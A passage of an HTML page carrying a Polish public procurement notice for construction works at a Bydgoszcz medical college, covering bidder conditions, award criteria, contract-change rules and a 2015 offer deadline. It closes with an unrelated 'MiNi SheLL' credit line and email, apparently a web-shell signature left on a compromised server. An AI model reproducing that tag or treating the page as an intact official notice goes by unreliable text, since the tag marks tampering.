do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. 10)Jeżeli
wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach
innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zamawiający, w celu oceny, czy
wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego
wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje
rzeczywisty dostęp do ich zasobów, żąda: a)dokumentów dotyczących w szczególności: zakresu dostępnych wykonawcy zasobów innego podmiotu, sposobu wykorzystania zasobów innego podmiotu,
przez wykonawcę, przy wykonywaniu zamówienia,charakteru stosunku, jaki będzie łączył wykonawcę z
innym podmiotem,zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. 11)Podmiot,
który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b ustawy, odpowiada solidarnie z
Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za
nieudostępnienie zasobów nie ponosi winy. 12)Jeżeli zmiana albo rezygnacja z Podwykonawcy dotyczy
podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b
ustawy, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1
ustawy, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny Podwykonawca lub
Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o
udzielenie zamówienia. 13)W przypadku Wykonawców wspólnie ubiegających się o udzielenie
zamówienia, do oferty musi być załączony dokument ustanawiający pełnomocnika Wykonawców
występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia albo
reprezentowania w postępowaniu i zawarcia Umowy w sprawie zamówienia publicznego. Treść
pełnomocnictwa musi jednoznacznie wskazywać czynności, do wykonywania których pełnomocnik jest
upoważniony (zakres umocowania). Pełnomocnictwo należy złożyć w oryginale lub kopii poświadczonej
notarialnie za zgodność z oryginałem. Jeżeli oferta tych Wykonawców zostanie wybrana, Zamawiający
przed zawarciem Umowy w sprawie zamówienia publicznego, może zażądać Umowy regulującej
współpracę tych Wykonawców. 14)Zamawiający dokona oceny spełniania warunków udziału w
postępowaniu na podstawie treści i informacji zawartych w oświadczeniach i dokumentach załączonych do
oferty. 15)Ocena spełniania warunków nastąpi wg formuły spełnia nie spełnia. 16)W przypadku, gdy
Wykonawcę reprezentuje pełnomocnik, do oferty należy dołączyć pełnomocnictwo podpisane przez osoby
uprawnione do reprezentowania Wykonawcy. Treść pełnomocnictwa musi jednoznacznie wskazywać
czynności, do wykonywania których pełnomocnik jest upoważniony (zakres umocowania). Pełnomocnictwo
należy złożyć w oryginale lub kopii poświadczonej notarialnie za zgodność z oryginałem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji na roboty budowlane - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której
dokonano wyboru Wykonawcy, za wyjątkiem określonych w ust. 2 możliwości i warunków dokonania tej
zmiany. 2. Zmiany Umowy mogą nastąpić w przypadkach określonych we wcześniejszych jej
postanowieniach. Ponadto, zmiany Umowy mogą nastąpić, gdy konieczność wprowadzenia takich zmian
wynika z: 1) zaistnienia zdarzenia o charakterze siły wyższej, niezależnego od Stron, 2) wykonanie
nieprzewidzianych robót dodatkowych, 3) konieczności zmiany terminu realizacji przedmiotu Umowy
wskutek zaistnienia obiektywnych przyczyn technicznych lub zaistnienia zdarzenia, które uniemożliwiłoby
terminowe wykonanie zobowiązań lub zaistnienia innych okoliczności niezależnych od Wykonawcy lub,
których Wykonawca przy zachowaniu należytej staranności nie był w stanie uniknąć lub przewidzieć, jak
również zaistnienia innych przeszkód lub utrudnień w wykonywaniu przedmiotu Umowy spowodowanego
przez osoby trzecie, 4) konieczności zmiany terminu realizacji przedmiotu Umowy wskutek zaistnienia
zdarzenia/zdarzeń niezależnego od Zamawiającego lub niezawinionych przez Zamawiającego, w tym
takiego/takich, których Zamawiający przy zachowaniu należytej staranności nie był w stanie uniknąć lub
przewidzieć, jak również w przypadku zmiany warunków finansowania lub zaistnienia innych niezależnych
od niego czynników, 5) konieczności zmiany terminu realizacji przedmiotu Umowy wynikającej z przyczyn
zależnych od Strony, gdy zmiana terminu jest konieczna dla prawidłowego wykonania przedmiotu Umowy,
ale niedochowanie terminu nie wynika z winy umyślnej lub rażącego niedbalstwa danej Strony; 6) zmiany
powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację Umowy; 7)
konieczności wprowadzenia zmian dotyczących treści o charakterze informacyjno - instrukcyjnym,
niezbędnym dla sprawnej realizacji Umowy w szczególności: zmian osób uprawnionych do kontaktów,
zmian osób odpowiedzialnych za potwierdzenie prawidłowej realizacji Umowy wraz z numerami telefonów,
faksu, poczty elektronicznej, etc.; 8) obniżenia wysokości Wynagrodzenia Wykonawcy w przypadkach
wynikających z Umowy lub przepisów prawa; 9) zmiany wysokości Wynagrodzenia, w przypadku zmiany
przepisów obowiązujących dotyczących podatku od towarów i usług; 10) zmiany strony Umowy tj.
Wykonawcy, w sytuacji wystąpienia sukcesji generalnej z mocy prawa. 11) Zmiany osób o których mowa w
§ 16 ust. 1 oraz 2 umowy. 3. Dokonanie zmiany umowy w zakresie wynikającym z ust. 2 wymaga
uprzedniego złożenia na piśmie prośby Wykonawcy wskazującej zasadność wprowadzenia zmian i zgody
Zamawiającego na jej dokonanie lub przedłożenia propozycji zmiany przez Zamawiającego. Jakiekolwiek
zmiany Umowy nie powodują zwiększenia Wynagrodzenia, o którym mowa w § 14 ust. 1 z zastrzeżeniem
zmian wynikających wskutek zmian stawek podatku od towarów i usług. 5. Jakiekolwiek zmiany Umowy
opisane w niniejszym paragrafie, o ile co innego wyraźnie nie wynika z poprzednich postanowień Umowy,
wymagają pod rygorem nieważności zachowania formy pisemnej w postaci aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.cm.umk.pl (zakładka zamówienia publiczne)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego w Bydgoszczy przy ulicy
Jagiellońskiej 15, budynek F, pokój nr 55a, II piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.10.2015 godzina 10:00, miejsce: Siedziba Zamawiającego w Bydgoszczy przy ulicy
Jagiellońskiej 15, budynek F, pokój nr 56 (sekretariat Zastępcy Kanclerza ds. CM), II piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com